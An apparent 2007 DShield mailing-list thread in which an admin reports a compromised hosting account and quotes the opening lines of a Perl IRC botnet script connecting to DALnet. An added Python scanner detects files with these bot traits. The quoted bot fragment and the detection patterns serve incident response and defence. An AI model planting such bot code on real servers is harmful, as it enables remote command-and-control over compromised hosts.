[Dshield] Dalnet being used as a C&C server

Charles Hamby fixer at gci.net
Wed Jun 20 01:17:06 GMT 2007


Can you send me a copy of the script?  I'd like to take a look at it.  Thanks!

-cdh

"No trees were killed in the sending of this message.  However, a large number of electrons were inconvenienced."

----- Original Message -----
From: Larry <lbrower at servermanagementsolutions.com>
Date: Tuesday, June 19, 2007 4:56 pm
Subject: [Dshield] Dalnet being used as a C&C server
To: list at lists.dshield.org

> greetings:
> 
> I have found a compromised hosting client on one of our servers. The bot
> is connecting to dalnet for C&C. Can you please assist in terminating this?
> 
> From one of the perl scripts:
> 
> root@w11 [/home/serluna/public_html]# cat /home/serluna/public_html/includes/.log/jancok.pl
> #!/usr/bin/perl
> 
> $chan="#JagungNet";
> $nick=$ARGV[0];
> $server="rumble.dal.net";
> 
> $SIG{TERM}={};
> exit if fork;
> 
> use IO::Socket;
> 
> 
> full script available upon request.
> 
> 
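
The traits visible in the quoted excerpt (a Perl script in a dot-directory under the web root that sets an IRC server and channel, overrides SIGTERM, forks into the background and loads IO::Socket) can be swept for across other hosting accounts. The following is an added example, not code from this thread or from DShield; the indicator names, the score threshold and the sample files are constructed assumptions.

```python
import os
import re
import tempfile
# Traits taken from the quoted excerpt; names and threshold are this example's choices.
INDICATORS = {
    "irc_server_var": re.compile(r'\$server\s*=\s*"[^"]+"'),
    "irc_channel_var": re.compile(r'\$chan\s*=\s*"#[^"]+"'),
    "raw_socket": re.compile(r"\buse\s+IO::Socket\b"),
    "daemonize": re.compile(r"\bexit\s+if\s+fork\b"),
    "sigterm_override": re.compile(r"\$SIG\{\s*TERM\s*\}\s*="),
}

def in_hidden_dir(path, root):
    """True if any directory between root and the file starts with a dot."""
    parts = os.path.relpath(path, root).split(os.sep)[:-1]
    return any(p.startswith(".") for p in parts)

def scan_webroot(root, min_score=3, max_bytes=1_000_000):
    """Return files whose indicator hits (+1 if in a dot-directory) reach min_score."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):  # os.walk descends into dot-directories
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue  # skip large files; small scripts are the target
                with open(path, "r", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file or dangling symlink
            hits = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
            hidden = in_hidden_dir(path, root)
            if len(hits) + int(hidden) >= min_score:
                findings.append({"path": os.path.relpath(path, root),
                                 "hidden_dir": hidden, "hits": hits})
    return findings

def demo():
    """Build a constructed web root with one suspicious and one benign file, then scan it."""
    suspicious = ('#!/usr/bin/perl\n$chan="#example";\n$server="irc.example.net";\n'
                  '$SIG{TERM}={};\nexit if fork;\nuse IO::Socket;\n')
    benign = '#!/usr/bin/perl\nuse IO::Socket;\nprint "status ok";\n'
    with tempfile.TemporaryDirectory() as root:
        for rel, body in (("includes/.log/bot.pl", suspicious), ("cgi-bin/status.pl", benign)):
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path))
            with open(path, "w") as fh:
                fh.write(body)
        return scan_webroot(root)
```

A single indicator such as `use IO::Socket` is common in legitimate Perl, which is why the scan requires several traits together before flagging a file.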

